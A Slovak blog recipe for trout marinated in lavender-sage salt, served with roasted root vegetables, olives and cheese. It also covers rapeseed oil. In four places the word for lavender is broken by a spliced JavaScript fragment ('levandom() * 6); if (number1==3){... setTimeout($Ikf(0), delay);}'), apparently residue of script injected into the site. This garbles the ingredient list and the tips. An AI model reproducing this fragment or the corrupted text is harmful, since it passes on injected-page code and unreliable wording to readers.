Pstruh s levanduľovo-šalviovou soľou

Šalvia je pre mňa zázračná bylina. Aj keď to nebolo vždy tak. Keď som ju prvý raz ovoňala, povedala som si – nie, ďakujem. Ale potom sa mi tehotenstvom zmenili chute a vôňa šalvie sa mi zrazu začala páčiť. A keď som ju spojila s mojou milovanou levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľou a hrubozrnnou soľou v pomere 1:1, mám hneď korenie na ryby „par excellence“. Smelo do toho.

Vzhľadom k tomu, že som sa rozhodla pripraviť pstruhy, je tiež dôležité v akom tuku ich marinujeme. Ja používam repkový olej. Hoci je tu už jar, nebojte sa siahnuť po dobrých tukoch. Repkový olej obsahuje najmenej nepriaznivých nasýtených tukov – obsah je dvakrát  nižší ako v olivovom alebo slnečnicovom oleji. 1 Ďalej obsahuje veľké množstvo nenasýtených mastných kyselín zo skupiny omega. Má preto veľmi priaznivé zloženie mastných kyselín v porovnaní s inými populárnymi rastlinnými olejmi. Okrem toho, repkový olej má ideálny pomer mastných kyselín omega-6 k omega-3, tj. 2:1. Rafinovaný je vhodný na smaženie, pečenie, dusenie a do šalátov. A čo je dôležité, môže byť súčasťou jedálnička detí od 6 mesiacov.

Ingrediencie na pstruhy

  • 3 pstruhy
  • 2 lyžice repkového oleja
  • levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľa, šalvia, soľ – po lyžici

Ingrediencie na ratatouile

  • 2 mrkvy
  • 2 petržleny
  • 1 malá cvikla
  • 2 stonky stopkového zeleru
  • 1 hrsť cherry paradajok
  • 1 hrsť čiernych olív s kôstkou
  • 1 syr balkánskeho typu
  • 1 vetvička čerstvého tymiánu
  • niekoľko strúčikov cesnaku
  • soľ, korenie
  • 2 lyžice repkového oleja

Postup

  1. Predhrejte rúru na 220 stupňov Celzia. Olúpte koreňovú zeleninu, umyte, nakrájajte na tenké plátky (cviklu na malé kocky) a orestujte na oleji, pridajte na kúsky nakrájaný stopkový zeler a duste zakryté pod pokrievkou asi 5 minút.
  2. Posoľte, okoreňte, pridajte polovičky cherry paradajok, strúčiky cesnaku v šupke, preložte do pekáča, pridajte celé olivy, na kocky nakrájaný syr, lístky tymiánu a zakryte pokrievkou alebo alobalom. Pečte asi 30 minút. Po pol hodinke odokryte alobal, do rúry pridajte plech s pstruhmi a pečte odokryté asi 15 – 20 minút.

TIP: Z rýb odstráňte šupiny a poriadne umyte a osušte. Urobte rovnobežné zárezy v chrbtovej časti z oboch strán. Potrite olejom a ryby poriadne posoľte levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovo-šalviovou soľou. Odložte do chladničky a pácujte aspoň 2 hodiny. Ak nemáte levandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anduľovo-šalviovú soľ, rybku si po naservírovaní môžete pokvapkať mojou špecialitkou – citrónovú šťavu zmiešajte s prelisovaným strúčikom cesnaku a troškou soli. Spolu je to nebíčko v pusinke, sľubujem.

Ak nerobíte pečenú zeleninku, tak môžete pstruhov hneď po nasolení vložiť do studenej rúry. Zapnite funkciu gril na 250 stupňov a pečte 15-20 minút. Všetko ale závisí ako vždy od toho, ako vám pečie rúra.

1 J. Krzymański, Olej rzepakowy – nowy surowiec, nowa prawda, PSPO, Warszawa 2009.

logo-zamiluj saenjoy logo_jpg

logotypy_pasik_SK2verzia

Ohodnoť Recept

Napíš Koment

Vaša e-mailová adresa nebude zverejnená.

*